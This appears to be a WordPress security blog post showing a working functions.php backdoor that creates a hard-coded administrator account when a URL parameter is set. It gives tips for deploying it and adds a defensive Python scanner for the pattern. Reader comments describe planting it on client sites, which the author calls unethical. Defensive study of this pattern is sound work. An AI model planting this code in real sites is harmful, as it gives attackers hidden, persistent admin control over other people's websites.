
WordPress Backdoor to Create Administrator Account

While doing a WordPress security audit and WordPress security lock down for one of our customers, I noticed he had a WordPress password backdoor installed on his WordPress installation. The WordPress backdoor is a very simple, yet powerful PHP script which can be triggered by accessing a specific URL using a normal web browser, such as Google Chrome or Firefox.

Once the WordPress backdoor is triggered, a new WordPress user with Administrator role is automatically created on the customer’s WordPress website, which a malicious user can use to regain access to someone’s WordPress installation any time he or she wants. In this post we will have a look at this WordPress backdoor’s code and explain how it works.

Note: This post is for educational and learning purposes ONLY. In fact we DO NOT recommend anyone to use such a backdoor in his or her WordPress installation.

WordPress Backdoor

The WordPress backdoor is listed in the below example. It is a simple PHP function that can be added to the WordPress theme’s functions.php file.

<?php
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

The backdoor can be triggered by accessing the URL https://melapress.com?backdoor=go if it is installed on https://melapress.com/ (this is a NON-working example).

How Does the WordPress Password Backdoor Work?

Using the above example, once the WordPress backdoor is triggered a new WordPress administrator account is created with the following credentials:

User:  backdooradmin
Password: Pa55W0rd

Using the WordPress Backdoor

If you would like to use the above WordPress backdoor for whatever reason you might have, use a different URL (by changing the GET variable and value on line 5) from the one specified in the above example. Also use a strong username and password (specified on line 8).

WP White Security Tip: We DO NOT recommend using such a WordPress backdoor. The information in this post should only be used for educational and learning purposes.

Please note that by posting information about this WordPress backdoor online, we are not exposing anything malicious. For someone to create such a backdoor, he or she would need FTP access to your WordPress website. If someone manages to gain FTP access to your WordPress website, there are many other things you should worry about rather than this WordPress backdoor.
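From the defensive side, the useful exercise is to find code of this shape in theme and plugin files once file access is suspected. The Python scanner below is an added example, not code from this post or from Melapress. It flags any PHP function that creates a user or grants the administrator role, rates the finding "high" when the same function reads request input ($_GET, $_POST, $_REQUEST, $_COOKIE), and notes whether the function is wired to a hook such as wp_head that fires for anonymous visitors. The sample inputs are constructed (the post's own snippet, and a hypothetical import helper named acme_import_users), and the regular expressions are heuristics rather than a PHP parser.

```python
"""Scan WordPress PHP files for functions that create a user or grant the
administrator role in response to request input (the functions.php backdoor
pattern). Added example; the regexes are heuristics, not a full PHP parser."""
import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Calls that create an account or hand out the administrator role.
PRIV_CALLS = [
    ("wp_create_user", re.compile(r"\bwp_create_user\s*\(")),
    ("wp_insert_user", re.compile(r"\bwp_insert_user\s*\(")),
    ("set_role(administrator)", re.compile(r"->\s*set_role\s*\(\s*['\"]administrator['\"]")),
    ("add_role(administrator)", re.compile(r"->\s*add_role\s*\(\s*['\"]administrator['\"]")),
]
# Attacker-controllable trigger: any read of a request superglobal.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
# add_action('hook', 'callback') with string-literal arguments.
ADD_ACTION = re.compile(r"add_action\s*\(\s*['\"]([\w/.-]+)['\"]\s*,\s*['\"](\w+)['\"]")
# Hooks that run on unauthenticated front-end requests.
FRONTEND_HOOKS = {"wp_head", "wp_footer", "init", "wp_loaded", "wp", "template_redirect"}
FUNC_DEF = re.compile(r"\bfunction\s+([A-Za-z_]\w*)\s*\([^)]*\)\s*\{")


@dataclass
class Finding:
    path: str
    line: int
    function: str
    severity: str  # "high": request-triggered; "review": privilege call without a trigger
    reason: str


def _functions(source):
    """Yield (name, body, line) for each named function, using brace counting."""
    for m in FUNC_DEF.finditer(source):
        depth = 0
        for i in range(m.end() - 1, len(source)):  # m.end() - 1 is the opening brace
            if source[i] == "{":
                depth += 1
            elif source[i] == "}":
                depth -= 1
                if depth == 0:
                    yield m.group(1), source[m.end():i], source.count("\n", 0, m.start()) + 1
                    break


def scan_source(source, path="<string>"):
    """Return a list of Findings for one PHP source text."""
    hooks = {}  # callback name -> first hook it is attached to
    for hook, callback in ADD_ACTION.findall(source):
        hooks.setdefault(callback, hook)
    findings = []
    for name, body, line in _functions(source):
        calls = [label for label, rx in PRIV_CALLS if rx.search(body)]
        if not calls:
            continue
        triggered = bool(REQUEST_INPUT.search(body))
        parts = ["calls " + ", ".join(calls)]
        if triggered:
            parts.append("gated on request input ($_GET/$_POST/...)")
        hook = hooks.get(name)
        if hook:
            note = " (runs for anonymous visitors)" if hook in FRONTEND_HOOKS else ""
            parts.append(f"hooked on '{hook}'{note}")
        findings.append(Finding(path, line, name, "high" if triggered else "review", "; ".join(parts)))
    return findings


def scan_tree(root):
    """Scan every *.php file under root (e.g. wp-content) and collect Findings."""
    findings = []
    for php in sorted(Path(root).rglob("*.php")):
        findings.extend(scan_source(php.read_text(errors="replace"), str(php)))
    return findings


# Constructed sample: the functions.php backdoor shown in the post.
SAMPLE_BACKDOOR = """<?php
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>"""

# Constructed sample: a hypothetical import helper that creates users but is
# not driven by request input, so it is reported for review rather than as high.
SAMPLE_IMPORT = """<?php
function acme_import_users($rows) {
    foreach ($rows as $row) {
        wp_create_user($row['login'], wp_generate_password(), $row['email']);
    }
}
"""

if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_source(SAMPLE_BACKDOOR, "functions.php")
    for f in results:
        print(f"[{f.severity}] {f.path}:{f.line} {f.function}(): {f.reason}")
```

Run it as `python scan.py /path/to/wp-content` to walk themes and plugins; with no argument it scans the constructed sample. Hook and trigger detection only handles string-literal callbacks, so closures, variable function names and obfuscated (base64/eval) code need a separate check; treat every "review" hit in a theme as worth a look, since themes rarely have a legitimate reason to create accounts.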

If you would like to make a WordPress Security Audit, harden the security of your WordPress installation or need any type of WordPress professional support, drop us an email on support@melapress.com.


6 thoughts on “WordPress Backdoor to Create Administrator Account”

  1. It worked perfectly, thanks a lot!
    I’ve been ripped off once so I believe leaving a backdoor until the client pays you in full is more than legit.
    I would just suggest specifying that the abovementioned credentials should be changed every time, otherwise anyone could run a simple script and find backdoors like the above.
    Just my 2 cents.
    Regards,
    Pat

    1. Glad it worked for you. However, I do not recommend using this as a backdoor on your clients' websites. Such an approach is really unethical and very risky! There are several other ways to protect your benefits / business without using such measures.

  2. Guys, I need to erase an entire post along with its corresponding photos in my blog. But whenever I sign in and look at my dashboard, the post isn’t there. Impossible to delete something that doesn’t exist, right? But when I web search or view the blog site, the post and photos are there. What’s happening here? No, I did not use that reality stone on my blog.

    Here’s my WordPress blog — jonianzures.wordpress.com and I want to completely remove the post “Janet and Niña at SM City – Marilao” and its pictures. Many thanks, amigos!

    You can delete it from there or just me how to dowg it.

  3. Hi, the script works as you explain but I keep getting this error: “You do not have sufficient permissions to access this page.” Even after I log out and then use the normal admin access, I can see the new account made along with the user role being admin, but I still get the error. I am using 3.4.2. Please help.

    1. Hi Tico,

      Thank you for following our blog. We are willing to assist you in solving your issue, but due to the sensitivity of the issue (i.e. a WordPress backdoor implementation), contact us directly via our contact form, since we need to verify that you are the owner of the website you are working on.

